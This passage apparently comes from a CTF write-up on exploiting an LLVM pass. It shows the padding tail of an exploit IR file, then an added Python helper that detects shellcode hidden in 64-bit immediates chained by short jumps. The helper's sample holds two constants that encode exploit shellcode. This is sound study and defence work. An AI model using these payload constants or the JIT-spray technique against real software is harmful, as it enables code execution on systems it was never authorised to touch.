%100 = add nsw i64 %99, 1024
%101 = add nsw i64 %100, 1024
%102 = add nsw i64 %101, 1024
%103 = add nsw i64 %102, 1024
%104 = add nsw i64 %103, 1024
%105 = add nsw i64 %104, 1024
%106 = add nsw i64 %105, 1024
%107 = add nsw i64 %106, 1024
%108 = add nsw i64 %107, 1024
%109 = add nsw i64 %108, 1024
%110 = add nsw i64 %109, 1024
%111 = add nsw i64 %110, 1024
%112 = add nsw i64 %111, 1024
%113 = add nsw i64 %112, 1024
%114 = add nsw i64 %113, 1024
%115 = add nsw i64 %114, 1024
%116 = add nsw i64 %115, 1024
%117 = add nsw i64 %116, 1024
%118 = add nsw i64 %117, 1024
%119 = add nsw i64 %118, 1024
%120 = add nsw i64 %119, 1024
%121 = add nsw i64 %120, 1024
%122 = add nsw i64 %121, 1024
%123 = add nsw i64 %122, 1024
%124 = add nsw i64 %123, 1024
%125 = add nsw i64 %124, 1024
%126 = add nsw i64 %125, 1024
%127 = add nsw i64 %126, 1024
%128 = add nsw i64 %127, 1024
%129 = add nsw i64 %128, 1024
%130 = add nsw i64 %129, 1024
%131 = add nsw i64 %130, 1024
%132 = add nsw i64 %131, 1024
%133 = add nsw i64 %132, 1024
%134 = add nsw i64 %133, 1024
%135 = add nsw i64 %134, 1024
%136 = add nsw i64 %135, 1024
%137 = add nsw i64 %136, 1024
%138 = add nsw i64 %137, 1024
%139 = add nsw i64 %138, 1024
%140 = add nsw i64 %139, 1024
%141 = add nsw i64 %140, 1024
%142 = add nsw i64 %141, 1024
%143 = add nsw i64 %142, 1024
%144 = add nsw i64 %143, 1024
%145 = add nsw i64 %144, 1024
%146 = add nsw i64 %145, 1024
%147 = add nsw i64 %146, 1024
%148 = add nsw i64 %147, 1024
%149 = add nsw i64 %148, 1024
%150 = add nsw i64 %149, 1024
%151 = add nsw i64 %150, 1024
%152 = add nsw i64 %151, 1024
%153 = add nsw i64 %152, 1024
%154 = add nsw i64 %153, 1024
%155 = add nsw i64 %154, 1024
%156 = add nsw i64 %155, 1024
%157 = add nsw i64 %156, 1024
%158 = add nsw i64 %157, 1024
%159 = add nsw i64 %158, 1024
%160 = add nsw i64 %159, 1024
%161 = add nsw i64 %160, 1024
%162 = add nsw i64 %161, 1024
%163 = add nsw i64 %162, 1024
%164 = add nsw i64 %163, 1024
%165 = add nsw i64 %164, 1024
%166 = add nsw i64 %165, 1024
%167 = add nsw i64 %166, 1024
%168 = add nsw i64 %167, 1024
%169 = add nsw i64 %168, 1024
%170 = add nsw i64 %169, 1024
%171 = add nsw i64 %170, 1024
%172 = add nsw i64 %171, 1024
%173 = add nsw i64 %172, 1024
%174 = add nsw i64 %173, 1024
%175 = add nsw i64 %174, 1024
%176 = add nsw i64 %175, 1024
%177 = add nsw i64 %176, 1024
%178 = add nsw i64 %177, 1024
%179 = add nsw i64 %178, 1024
%180 = add nsw i64 %179, 1024
%181 = add nsw i64 %180, 1024
%182 = add nsw i64 %181, 1024
%183 = add nsw i64 %182, 1024
%184 = add nsw i64 %183, 1024
%185 = add nsw i64 %184, 1024
%186 = add nsw i64 %185, 1024
%187 = add nsw i64 %186, 1024
%188 = add nsw i64 %187, 1024
%189 = add nsw i64 %188, 1024
%190 = add nsw i64 %189, 1024
%191 = add nsw i64 %190, 1024
%192 = add nsw i64 %191, 1024
%193 = add nsw i64 %192, 1024
%194 = add nsw i64 %193, 1024
%195 = add nsw i64 %194, 1024
%196 = add nsw i64 %195, 1024
%197 = add nsw i64 %196, 1024
%198 = add nsw i64 %197, 1024
%199 = add nsw i64 %198, 1024
%200 = add nsw i64 %199, 1024
%201 = add nsw i64 %200, 1024
%202 = add nsw i64 %201, 1024
%203 = add nsw i64 %202, 1024
%204 = add nsw i64 %203, 1024
%205 = add nsw i64 %204, 1024
%206 = add nsw i64 %205, 1024
%207 = add nsw i64 %206, 1024
%208 = add nsw i64 %207, 1024
%209 = add nsw i64 %208, 1024
%210 = add nsw i64 %209, 1024
%211 = add nsw i64 %210, 1024
%212 = add nsw i64 %211, 1024
%213 = add nsw i64 %212, 1024
%214 = add nsw i64 %213, 1024
%215 = add nsw i64 %214, 1024
%216 = add nsw i64 %215, 1024
%217 = add nsw i64 %216, 1024
%218 = add nsw i64 %217, 1024
%219 = add nsw i64 %218, 1024
%220 = add nsw i64 %219, 1024
%221 = add nsw i64 %220, 1024
%222 = add nsw i64 %221, 1024
%223 = add nsw i64 %222, 1024
%224 = add nsw i64 %223, 1024
%225 = add nsw i64 %224, 1024
%226 = add nsw i64 %225, 1024
%227 = add nsw i64 %226, 1024
%228 = add nsw i64 %227, 1024
%229 = add nsw i64 %228, 1024
%230 = add nsw i64 %229, 1024
%231 = add nsw i64 %230, 1024
%232 = add nsw i64 %231, 1024
%233 = add nsw i64 %232, 1024
%234 = add nsw i64 %233, 1024
%235 = add nsw i64 %234, 1024
%236 = add nsw i64 %235, 1024
%237 = add nsw i64 %236, 1024
%238 = add nsw i64 %237, 1024
%239 = add nsw i64 %238, 1024
%240 = add nsw i64 %239, 1024
%241 = add nsw i64 %240, 1024
%242 = add nsw i64 %241, 1024
%243 = add nsw i64 %242, 1024
%244 = add nsw i64 %243, 1024
%245 = add nsw i64 %244, 1024
%246 = add nsw i64 %245, 1024
%247 = add nsw i64 %246, 1024
%248 = add nsw i64 %247, 1024
%249 = add nsw i64 %248, 1024
%250 = add nsw i64 %249, 1024
%251 = add nsw i64 %250, 1024
%252 = add nsw i64 %251, 1024
%253 = add nsw i64 %252, 1024
%254 = add nsw i64 %253, 1024
%255 = add nsw i64 %254, 1024
%256 = add nsw i64 %255, 1024
%257 = add nsw i64 %256, 1024
%258 = add nsw i64 %257, 1024
%259 = add nsw i64 %258, 1024
%260 = add nsw i64 %259, 1024
%261 = add nsw i64 %260, 1024
%262 = add nsw i64 %261, 1024
%263 = add nsw i64 %262, 1024
%264 = add nsw i64 %263, 1024
%265 = add nsw i64 %264, 1024
%266 = add nsw i64 %265, 1024
%267 = add nsw i64 %266, 1024
%268 = add nsw i64 %267, 1024
%269 = add nsw i64 %268, 1024
%270 = add nsw i64 %269, 1024
%271 = add nsw i64 %270, 1024
%272 = add nsw i64 %271, 1024
%273 = add nsw i64 %272, 1024
%274 = add nsw i64 %273, 1024
%275 = add nsw i64 %274, 1024
%276 = add nsw i64 %275, 1024
%277 = add nsw i64 %276, 1024
%278 = add nsw i64 %277, 1024
%279 = add nsw i64 %278, 1024
%280 = add nsw i64 %279, 1024
%281 = add nsw i64 %280, 1024
%282 = add nsw i64 %281, 1024
%283 = add nsw i64 %282, 1024
%284 = add nsw i64 %283, 1024
%285 = add nsw i64 %284, 1024
%286 = add nsw i64 %285, 1024
%287 = add nsw i64 %286, 1024
%288 = add nsw i64 %287, 1024
%289 = add nsw i64 %288, 1024
%290 = add nsw i64 %289, 1024
%291 = add nsw i64 %290, 1024
%292 = add nsw i64 %291, 1024
%293 = add nsw i64 %292, 1024
%294 = add nsw i64 %293, 1024
%295 = add nsw i64 %294, 1024
%296 = add nsw i64 %295, 1024
%297 = add nsw i64 %296, 1024
%298 = add nsw i64 %297, 1024
%299 = add nsw i64 %298, 1024
%300 = add nsw i64 %299, 1024
%301 = add nsw i64 %300, 1024
%302 = add nsw i64 %301, 1024
%303 = add nsw i64 %302, 1024
%304 = add nsw i64 %303, 1024
%305 = add nsw i64 %304, 1024
%306 = add nsw i64 %305, 1024
%307 = add nsw i64 %306, 1024
%308 = add nsw i64 %307, 1024
%309 = add nsw i64 %308, 1024
%310 = add nsw i64 %309, 1024
%311 = add nsw i64 %310, 1024
%312 = add nsw i64 %311, 1024
%313 = add nsw i64 %312, 1024
%314 = add nsw i64 %313, 1024
%315 = add nsw i64 %314, 1024
%316 = add nsw i64 %315, 1024
%317 = add nsw i64 %316, 1024
%318 = add nsw i64 %317, 1024
ret i64 %318
}
attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}
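An added triage helper, not code from the original post, that does the reverse of the generator above: it pulls the 64-bit immediates out of `add nsw i64` instructions in an .ll file and flags the ones that decode to a 6-byte instruction chunk padded with nop and chained with a 2-byte short jmp, so a reviewer can spot this kind of payload in IR before handing it to the pass. The sample IR is constructed from two of the constants in the exp above; the regex and the nop-stripping heuristic are assumptions, not part of the challenge.

```python
import re
import struct

# Constructed sample modelled on @payload2 above: small constants, two of the
# real 64-bit immediates from the exp, then one of the 1024 padding adds.
SAMPLE_IR = """\
define dso_local i64 @payload2(i64 %0) #0 {
  %2 = add nsw i64 %0, 1
  %3 = add nsw i64 %2, 16999839996723556031
  %4 = add nsw i64 %3, 16999840169015117071
  %5 = add nsw i64 %4, 1024
  ret i64 %5
}
"""

# Assumed shape of the textual IR the pass consumes: `add nsw i64 %reg, <imm>`.
ADD_IMM_RE = re.compile(r"add nsw i64 %\w+, (\d+)")
NOP = 0x90       # padding byte used by the generator
JMP_REL8 = 0xEB  # opcode of the 2-byte short jmp that chains the chunks


def extract_words(ir_text):
    """Return every immediate operand of an `add nsw i64` instruction, in order."""
    return [int(m.group(1)) for m in ADD_IMM_RE.finditer(ir_text)]


def classify_word(value):
    """Decode one immediate as a little-endian 8-byte word.

    Returns None for ordinary constants. For a word whose byte 6 is a short jmp
    opcode it returns the instruction bytes (trailing nop padding stripped, a
    heuristic that would over-strip an instruction that genuinely ends in 0x90),
    the number of padding bytes and the signed rel8 jump displacement."""
    if value < 0 or value >= 1 << 64:
        return None
    raw = struct.pack("<Q", value)
    if raw[6] != JMP_REL8:
        return None
    rel = struct.unpack("<b", raw[7:8])[0]
    body = raw[:6].rstrip(bytes([NOP]))
    return {"code": body.hex(), "pad": 6 - len(body), "jmp_rel": rel}


def scan_ir(ir_text):
    """Return (operand index, decoded chunk) for every immediate that looks like
    a code chunk chained by a short jmp; plain arithmetic constants are skipped."""
    hits = []
    for i, word in enumerate(extract_words(ir_text)):
        info = classify_word(word)
        if info is not None:
            hits.append((i, info))
    return hits


if __name__ == "__main__":
    for idx, info in scan_ir(SAMPLE_IR):
        print(f"operand {idx}: code={info['code']} pad={info['pad']} jmp rel8={info['jmp_rel']}")
```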
From: https://www.cnblogs.com/trunk/p/17581970.html